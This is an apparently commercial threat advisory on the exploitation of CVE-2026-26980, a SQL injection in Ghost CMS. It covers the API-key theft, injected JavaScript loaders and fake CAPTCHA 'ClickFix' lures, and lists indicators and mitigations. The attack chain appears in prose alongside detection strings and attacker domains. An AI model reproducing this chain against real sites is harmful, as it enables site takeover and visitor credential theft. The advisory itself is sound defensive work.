Executive Summary
A critical vulnerability, CVE-2026-26980, has been actively exploited in the wild, targeting the Ghost CMS platform. This unauthenticated blind SQL injection flaw in the Ghost CMS Content API (versions 3.24.0 through 6.19.0) has enabled threat actors to compromise over 700 websites globally. Attackers have leveraged this vulnerability to extract administrative credentials, inject malicious JavaScript into site content, and orchestrate large-scale "ClickFix" social engineering campaigns. These attacks redirect site visitors to counterfeit Cloudflare CAPTCHA pages, ultimately tricking users into executing malware that can steal credentials and establish persistent access. The campaign demonstrates a sophisticated blend of automated exploitation, advanced payload delivery, and effective user deception, underscoring the urgent need for immediate patching and comprehensive incident response.
Threat Actor Profile
The exploitation of CVE-2026-26980 is attributed to multiple financially motivated cybercriminal groups rather than a single advanced persistent threat (APT). Analysis of the attack infrastructure and payloads reveals at least two distinct clusters of activity, each utilizing unique sets of malicious domains and payload delivery mechanisms. These groups exhibit high technical proficiency, employing automated mass exploitation tools, leveraging commercial cloaking services such as Adspect to evade detection, and rapidly evolving their malware to bypass endpoint security solutions. Some overlap in tactics, techniques, and procedures (TTPs) has been observed with actors previously associated with the Aeternum campaign, though no direct attribution has been established. The threat actors demonstrate a strong focus on scalability, automation, and maximizing monetization through credential theft and potential lateral movement within compromised organizations.
Technical Analysis of Malware/TTPs
The attack chain begins with automated reconnaissance to identify vulnerable Ghost CMS instances. Exploiting the unauthenticated blind SQL injection in the Content API, attackers extract the Admin API Key directly from the backend database. With this key, they gain full administrative access via the Ghost Admin API, enabling bulk modification of published articles. Malicious JavaScript is appended to the content of each post, typically obfuscated using base64 encoding and dynamic script loading techniques.
The injected JavaScript acts as a loader, fetching a second-stage script from attacker-controlled domains such as clo4shara[.]xyz, cloud-verification[.]com, staticcloudflare[.]pro, and others. This script performs user-agent and referrer checks to evade automated scanners and security crawlers. Legitimate visitors are redirected to a counterfeit Cloudflare CAPTCHA page, which is visually indistinguishable from the real service. The page instructs users to press WIN+R and paste a command that downloads and executes a ZIP archive containing a malicious DLL or executable (e.g., NotepadPlusPlus.dll, UtilifySetup.exe).
The malware payloads are primarily stealer trojans, designed to exfiltrate browser credentials, session cookies, and system information. Some variants are built using the Electron framework, leveraging the setLoginItemSettings API for persistence on Windows systems. The malware establishes command-and-control (C2) communication over HTTPS, regularly beaconing to attacker infrastructure for further instructions or payload updates. Payloads are frequently updated to evade antivirus detection, with several samples exhibiting zero detections on VirusTotal at the time of discovery.
Key technical indicators include the presence of injected <script> tags containing atob(, appendChild, or btoa(a.origin) in article bodies, as well as abnormal PUT /ghost/api/admin/posts/:id/ requests in server logs. The attack demonstrates a high degree of automation, with scripts capable of scanning, exploiting, and mass-injecting hundreds of sites within hours.
Exploitation in the Wild
The exploitation campaign has impacted a diverse array of organizations, including prominent universities (such as Harvard and Oxford), SaaS providers, fintech firms, AI and machine learning startups, media outlets, and cybersecurity research blogs. The majority of compromised sites are personal blogs and independent publishers, but the breadth of affected sectors highlights the indiscriminate nature of the attack.
Threat actors have demonstrated agility in their operations, with multiple groups competing for control over compromised sites. In several instances, one group’s payloads have overwritten those of another, indicating a lack of coordination and a race to monetize access. The campaign has evolved rapidly, with initial payloads serving as statistical probes or benign test scripts, later replaced by fully weaponized stealers and remote access tools.
The attackers’ use of commercial cloaking services and dynamic payload delivery has complicated detection and response efforts. Many compromised sites remained infected for days or weeks before remediation, exposing thousands of visitors to the risk of malware infection and credential theft.
Victimology and Targeting
Analysis of the campaign reveals a global footprint, with confirmed victims in the United States, United Kingdom, European Union, Brazil, India, and other regions. The most heavily impacted sectors include personal blogs and independent sites, software development and SaaS companies, AI and machine learning organizations, Web3 and cryptocurrency platforms, educational institutions, media and publishing outlets, cybersecurity firms, and fintech providers.
The attackers have not demonstrated specific targeting based on sector or geography; rather, their approach is opportunistic, exploiting any vulnerable Ghost CMS instance discovered during automated scans. The inclusion of high-profile academic and technology organizations among the victims increases the risk of downstream compromise, as these sites often serve as trusted sources for a wide audience.
Mitigation and Countermeasures
Immediate action is required to mitigate the risk posed by CVE-2026-26980. All organizations running Ghost CMS versions 3.24.0 through 6.19.0 must upgrade to version 6.19.1 or later, which contains the official patch for this vulnerability. In addition to patching, organizations should rotate all Admin API Keys, administrative passwords, and session tokens, as these may have been compromised during the attack.
A comprehensive review of site content is essential to identify and remove injected JavaScript from articles and theme files. This may require direct database queries or the use of specialized content scanning tools. Server logs should be retained and analyzed for at least 30 days, focusing on abnormal API activity and connections to known malicious domains and URLs, including clo4shara[.]xyz, cloud-verification[.]com, staticcloudflare[.]pro, and others listed in the Indicators of Compromise (IOCs) section.
Organizations should notify users who accessed the site during the infection window, advising them to scan their systems for malware and reset credentials as a precaution. Endpoint detection and response (EDR) solutions should be updated with the latest IOCs, including malware hashes such as 5659292833ec421da11ebde005d9c9a8 and d30cc10d54ebc967c8538ff74f442eee.
To enhance resilience against similar attacks, organizations are encouraged to implement web application firewalls (WAFs), enforce least-privilege access controls, and monitor for anomalous API usage. Regular vulnerability scanning and prompt patch management are critical to reducing exposure to mass exploitation campaigns.
References
- XLab Qianxin Technical Analysis
- NVD CVE-2026-26980
- BleepingComputer Coverage
- TheCyberSecHub Twitter
- Reddit BlueTeamSec
- SonicWall Blog
- SentinelOne Advisory
- Ghost CMS Security Advisory
- Ghost CMS Patch Release
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify vulnerabilities, respond to emerging threats, and ensure compliance with industry standards. For more information about how Rescana can help safeguard your organization, or for any questions regarding this advisory, please contact us at ops@rescana.com.
